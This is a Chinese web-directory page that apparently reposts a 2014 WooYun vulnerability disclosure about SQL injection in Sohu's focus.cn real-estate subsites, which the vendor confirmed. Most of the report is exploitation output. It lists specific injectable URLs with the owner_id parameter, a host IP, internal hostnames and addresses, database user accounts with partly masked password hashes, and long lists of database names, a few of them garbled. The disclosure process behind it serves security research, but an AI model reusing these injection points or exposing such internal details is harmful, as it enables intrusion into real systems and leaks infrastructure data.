网站目录收录网站方式:1.人工手动审核。2.自助审核(你的网站在权重3、PR4以上,挂上本站友链->点击友链->自动审核通过。)
北京 天津 上海 广东 深圳 河北 河南 新疆 重庆 四川 贵州 湖南 湖北 云南 广西 宁夏 青海 甘肃 陕西
西藏 海南 山东 福建 安徽 浙江 吉林 山西 江西 江苏 辽宁 黑龙 内蒙 澳门 香港 台湾 日本 韩国 美国
当前位置:站长啦网站目录 » 新闻资讯 » 站长新闻 » 漏洞预警 » 文章详细 订阅RssFeed

[公开漏洞]搜狐(第二季)旗下某站通用型sql注入第三集(涉及数据库个数已经数不过来了)

来源:WooYun 浏览:785次 时间:2014-06-19
简介:搜狐(第二季)旗下某站通用型sql注入第三集(涉及数据库个数已经数不过来了) 相关厂商: 搜狐漏洞作者:浩天 提交时间:2014-05-05 10:54 公开时间:2014-06-19 10:55 漏洞类型:SQL注射漏洞危害等级:高 自

搜狐(第二季)旗下某站通用型sql注入第三集(涉及数据库个数已经数不过来了) 相关厂商: 搜狐 漏洞作者:浩天 提交时间:2014-05-05 10:54 公开时间:2014-06-19 10:55 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:20 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: php+数字类型注射 php+字符类型注射 Mysql 注射技巧 漏洞详情 披露状态:

2014-05-05:细节已通知厂商并且等待厂商处理中
2014-05-05:厂商已经确认,细节仅向厂商公开
2014-05-15:细节向核心白帽子及相关领域专家公开
2014-05-25:细节向普通白帽子公开
2014-06-04:细节向实习白帽子公开
2014-06-19:细节向公众公开

简要描述:

子站通用注入,不同域名链接的数据库服务器不一样,搜狐真是财大气粗,每个域名读库,发现都是不同的,从几十到上百的都有,影响的数据库个数多的数不过来,我也不一一尝试了

求个搜狐的礼物,可以有么,同志们你们说,应不应该

详细说明:

home、house域名有并发限制,请求大了就自动限制访问了,偏南方的域名没有限制

http://home.focus.cn/materials/owner_info.php?owner_id=5

这个涉及12个核心库,建议用下面的子域名尝试验证注入,home读的慢,得放胡萝卜里,sqlmap二了

http://sz.focus.cn/materials/owner_info.php?owner_id=46

http://cd.focus.cn/materials/owner_info.php?owner_id=9

http://wh.focus.cn/materials/owner_info.php?owner_id=14 我用的这个

http://cq.focus.cn/materials/owner_info.php?owner_id=6 还有这个

......

这个太多了,来张图吧,之前发的注入,也都是这种通用的情况

0.jpg

漏洞证明:

下面应该是87个库,其实还有很多,太多就不读了

Target: http://cq.focus.cn/materials/owner_info.php?owner_id=6

Host IP:123.125.92.26

Web Server: Apache

DB Server: MySQL Blind

Resp. Time(avg):47 ms

Current User: fdbuser@10.10.90.21

Sql Version: 5.1.55-log

Current DB: cqhouse

System User: fdbuser@10.10.90.21

Host Name: focus-gvm-10-10-90-187.no.sohu.com

Installation dir: /usr/local/mysql-5.1.55-linux-x86_64-glibc23/

DB User & Pass: root::localhost

root::127.0.0.1

readonly:5dd*********19d:%

mysqlmon:*565E94D*********8B6C0A37F:10.10.90.187

pingmysql:*565E94D80*********B6C0A37F:10.11.36.20

Data Bases: information_schema

ahsuzhouhouse

ahsuzhouhouse_forum

ahsuzhouhouse_sort

cdhouse

cdhouse_forum

cdhouse_sort

chenzhouhouse

chenzhouhouse_forum

chenzhouhouse_sort

cqhouse

cqhouse_forum

cqhouse_sort

deyanghouse

deyanghouse_forum

deyanghouse_sort

fshouse

fshouse_forum

fshouse_sort

ganzhouhouse

ganzhouiouse_forum

ganzhouhouse_sort

heyuanhouse

heyuanhouse_forum

heyuanhouse_sort

huangshihouse

huangshihouse_forum

huangshihouse_sort

jiangmenhouse

jiangmenhouse_forum

jiangmenhouse_sort

luanhouse

luanhouse_forum

luanhouse_sort

luzhouhouse

luzhouhouse_forum

luzhouhouse_sort

meishanhouse

meishanhouse_forum

meishanhouse_sort

mianyanghouse

mianyanghouse_forum

mianyanghouse_sort

mysql

mysql_identity

nanchonghouse

nanchonghouse_forum

nanchonghouse_sort

njhouse

njhouse_forum

njhouse_sort

nnhouse

nnhouse_forum

nnhouse_sort

qyhouse

qyhouse_forum

qyhouse_sort

shaoguanhouse

shaoguanhouse_forum

shaoguanhouse_sort

shundehouse

shundehouse_forum

shundehouse_sort

tonglinghouse

tonglinghouse_forum

tonglinghouse_sort

weinanhouse

weinanhouse_forum

weinanhouse_sort

wlmqhouse

wlmqhouse_forum

wlmqhouse_sort

wzhouse

wzhoute_forum

wzhquse_sort

xiaoganhouse

xiaoganhouse_forum

xiaoganhouse_sort

zhangzhouhouse

zhangzhouhouse_forum

zhangzhouhouue_sort

zhaoqingrouse

zhaoqinghouse_forur

zhaoqinghouse_sort

zjhouse

zjhouse_forum

zjhouse_sort

这个就读了几个,证明一下得了

Target: http://wh.focus.cn/materials/owner_info.php?owner_id=14

Host IP:123.125.92.26

Web Server: Apache

DB Server: MySQL Blind

Resp. Time(avg):43 ms

Current User: fdbuser@10.10.90.133

Sql Version: 5.1.55-log

Current DB: whhouse

System User: fdbuser@10.10.90.133

Host Name: vm-10-10-90-199-sas.cp.no.sohu.com

Installation dir: /usr/local/mysql5.1.55/

DB User & Pass: root::localhost

pingmysql:*565E9*********6C0A37F:10.11.36.20

root::127.0.0.1

Data Bases: information_schema

dongguanhouse

dongguanhouse_forum

dongguanhouse_sort

gzhouse

gzhouse_forum

gzhouse_sort

mysql

mysql_identity

test

whhouse

whhouse_forum

whhouse_sort

不继续了

修复方案:

求个搜狐的礼物,可以有么,我感觉我挺不容易的,你们也不容

版权声明:转载请注明来源 浩天@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-05-05 11:27

厂商回复:

感谢对搜狐安全关注

最新状态:

暂无


0

版权与免责声明:

凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;


本文地址:https://top.cnzzla.com/artinfo/1904.html

好玩的手游下载

猜你喜欢

推荐站点

  • 福州小程序开发福州小程序开发

    福州好小蚁科技提供专业的微信小程序开发、软件定制、手机APP开发、网站开发等高端定制外包服务,价格美丽,服务周到.一对一项目对接,不满意退全款!预约电话:13107632710 胡小春!福州好小蚁科技有限公司是福建福州网站app等技术开发优秀网络公司。

    www.fzant.com
  • 世界时间网世界时间网

    世界时间网为您提供世界各地精准时间,北京时间校准器,标准时间,世界各地时间与北京时间对比,时间换算等,希望对您有所帮助。

    top.cnzzla.com/time
  • 科技镇科技镇

    科技镇 | 关注科技、娱乐、人文、生活!

    www.kejizhen.com
  • 心动网址导航心动网址导航

    心动网址导航精选了国内国外著名的网站、好玩的、好看的、有趣的国内国外网站以及实用的、优秀的国内国外网站,包括国外视频、国外购物、国外交友、国外新闻等多种类型 同时提供精品行业分类目录提交,让用户全方位了解国内国外互联网动态!

    xd00.com
  • 门户网址-优秀网站导航门户网址-优秀网站导航

    门户网址-优秀网站导航,精选网址导航,免费分类目录提交,实用酷站大全。

    top.mhwz.cn

最新优秀网站